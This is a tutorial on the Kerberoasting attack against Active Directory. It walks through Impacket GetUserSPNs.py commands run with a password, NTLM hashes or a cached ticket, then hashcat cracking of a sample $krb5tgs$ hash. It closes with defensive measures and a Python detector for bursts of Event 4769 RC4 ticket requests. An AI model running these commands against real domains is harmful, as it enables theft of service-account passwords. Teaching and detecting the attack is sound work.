
What is Kerberoasting?
Kerberoasting is an attack in which an adversary holding any valid domain account requests service tickets (TGS) for accounts that have Service Principal Names (SPNs) registered, extracts those tickets, and cracks them offline to recover the service accounts' passwords. Offline cracking works because each service ticket is encrypted with a key derived from the service account's password, so once a ticket has been obtained no further interaction with the Domain Controller is needed.
Pre-requisites
Before running a Kerberoasting attack using Impacket, ensure the following:
- You have a valid domain user account (low-privilege).
- Impacket is installed on your system.
Install Impacket:
You can install Impacket using pip:
pip install impacket
Or clone the repository:
git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .
Kerberoasting Using Impacket
Impacket provides several tools, including GetUserSPNs.py, which can be used for Kerberoasting attacks.
Basic Command:
python3 GetUserSPNs.py <domain>/<username>:<password> -request
- <domain>: The Active Directory domain (e.g., contoso.local).
- <username>: The domain user's username.
- <password>: The password for the domain user.
This will request service tickets (TGS) for accounts with SPNs and output the extracted Kerberos tickets in a hash format that can be cracked.
Command Breakdown
Retrieve SPNs with TGS Tickets:
python3 GetUserSPNs.py <domain>/<username>:<password> -request
- This command will query for user accounts with associated SPNs and request a service ticket (TGS) for each.
- The TGS tickets are displayed in a format suitable for cracking (e.g., using hashcat).
Example Usage:
python3 GetUserSPNs.py contoso.local/ryan:Password123 -dc-ip 10.0.0.1 -request
- -dc-ip: Optional argument to specify the IP of the Domain Controller (if needed).
Specifying Hash Instead of Password:
If you have the NTLM hash of the domain user instead of their password, you can use it like so:
python3 GetUserSPNs.py <domain>/<username> -hashes <LMHASH>:<NTHASH> -request
- <LMHASH>:<NTHASH>: The LM and NT hashes of the user's password (e.g., aad3b435b51404eeaad3b435b51404ee:aad3b435b51404eeaad3b435b51404ee). The LM half may be left empty, as in the example below.
Example (with hash):
python3 GetUserSPNs.py contoso.local/ryan -hashes :aad3b435b51404eeaad3b435b51404ee -request
Saving Output to a File
You can redirect the output to a file for later use with a cracking tool like hashcat:
python3 GetUserSPNs.py <domain>/<username>:<password> -request > kerberoast_hashes.txt
Cracking Kerberos Tickets with Hashcat
Once you’ve obtained the service ticket hashes, the next step is to crack them offline using a tool like hashcat.
Example Command with Hashcat:
hashcat -m 13100 kerberoast_hashes.txt /path/to/wordlist.txt
- -m 13100: The hashcat hash mode for Kerberos 5 TGS-REP with etype 23 (RC4-HMAC), which is the $krb5tgs$23$ format GetUserSPNs.py emits.
- kerberoast_hashes.txt: The file containing the TGS hashes extracted by Impacket.
- /path/to/wordlist.txt: The wordlist to use for password cracking.
Example Output from Impacket:
$krb5tgs$23$*sqlservice$CONTOSO.LOCAL$contoso.local/sqlservice:88$0c593bb6db76f8a4bf39c7da99173b50$3be75864f120763769f571b13b0379e7bb3c49fa0ef0d6f3f7d4fcf300f519364a5aa23038096adfbecdb929c42124f37f0834656883a7cd02f26ac5c8b243c7bc72b58904c3467d9f640da799c026a6
This can be fed directly into hashcat to begin password cracking.
Advanced Options
Specify Kerberos Realm:
If you’re working in a multi-domain environment or need to specify a particular realm:
python3 GetUserSPNs.py <domain>/<username>:<password> -request -k -no-pass -target-domain <target-domain>
- -target-domain: The domain whose SPN accounts are queried, when it differs from the domain the credentials belong to.
- -k: Use Kerberos authentication instead of NTLM; the credentials are read from the ccache file named by the KRB5CCNAME environment variable.
- -no-pass: Do not prompt for a password (used together with -k when a cached ticket is available).
Using Kerberos Tickets (.kirbi files):
If you already have a Kerberos ticket-granting ticket (TGT), you can use it to request service tickets (TGS). Impacket reads the ticket from the ccache file named by the KRB5CCNAME environment variable (a .kirbi file must first be converted to ccache format, for example with Impacket's ticketConverter.py):
python3 GetUserSPNs.py <domain>/<username> -k -no-pass -target-domain <target-domain> -request
This command allows the attacker to continue Kerberoasting using a valid cached TGT rather than a password or hash.
Defensive Measures
To protect against Kerberoasting, organizations can:
- Enforce strong, complex passwords for service accounts.
- Limit which accounts are allowed to have SPNs.
- Regularly rotate service account passwords.
- Monitor and restrict the number of TGS requests for service accounts.
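The last measure above is the one defenders can act on immediately: every service ticket request lands in the Domain Controller's Security log as Event ID 4769, and a Kerberoasting run shows up as one account requesting RC4-encrypted (Ticket Encryption Type 0x17) tickets for many user-account SPNs within seconds. The script below is an added example, not code from the original post or from Impacket; it runs the detection over a handful of constructed 4769 records and flags the pattern (the field names and the 3-services-in-5-minutes threshold are assumptions you would tune for your environment).

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample 4769 records (not real logs). Keys mirror the event's
# Account Name, Service Name, Ticket Encryption Type and Client Address fields.
SAMPLE_4769 = [
    {"time": "2024-05-01T09:00:00", "account": "alice", "service": "FS01$", "etype": "0x12", "src": "10.0.0.21"},
    {"time": "2024-05-01T09:01:10", "account": "ryan", "service": "sqlservice", "etype": "0x17", "src": "10.0.0.55"},
    {"time": "2024-05-01T09:01:11", "account": "ryan", "service": "httpsvc", "etype": "0x17", "src": "10.0.0.55"},
    {"time": "2024-05-01T09:01:11", "account": "ryan", "service": "backupsvc", "etype": "0x17", "src": "10.0.0.55"},
    {"time": "2024-05-01T09:01:12", "account": "ryan", "service": "krbtgt", "etype": "0x17", "src": "10.0.0.55"},
    {"time": "2024-05-01T09:30:00", "account": "bob", "service": "sqlservice", "etype": "0x17", "src": "10.0.0.77"},
]

RC4_ETYPES = {"0x17", "0x18"}  # RC4-HMAC and RC4-HMAC-EXP; AES tickets are 0x11/0x12


def is_roastable(ev):
    """True for a ticket an attacker could crack offline: RC4-encrypted and issued
    for a user account with an SPN, i.e. not a computer account (name ends in '$',
    random 120-character password) and not the krbtgt account."""
    svc = ev["service"].strip().lower()
    return ev["etype"].lower() in RC4_ETYPES and not svc.endswith("$") and svc != "krbtgt"


def kerberoast_alerts(events, window=timedelta(minutes=5), min_services=3):
    """Group roastable requests by requesting account and return one alert per
    account that requested tickets for at least `min_services` distinct services
    inside any `window`-long span (assumed threshold; tune per environment)."""
    by_account = defaultdict(list)
    for ev in events:
        if is_roastable(ev):
            by_account[ev["account"]].append((datetime.fromisoformat(ev["time"]), ev["service"], ev["src"]))
    alerts = []
    for account, reqs in by_account.items():
        reqs.sort()  # chronological; sliding window starts at each request
        for i, (start, _, src) in enumerate(reqs):
            in_window = [r for r in reqs[i:] if r[0] - start <= window]
            services = sorted({r[1] for r in in_window})
            if len(services) >= min_services:
                alerts.append({"account": account, "src": src, "services": services, "first_seen": start.isoformat()})
                break  # one alert per account is enough for triage
    return alerts


if __name__ == "__main__":
    for a in kerberoast_alerts(SAMPLE_4769):
        print(f"ALERT {a['account']} from {a['src']} requested RC4 TGS for {a['services']} starting {a['first_seen']}")
```

On a real DC, feed the function with 4769 events exported from the Security log; alice's AES request for a computer account and bob's single request produce no alert, while ryan's burst does.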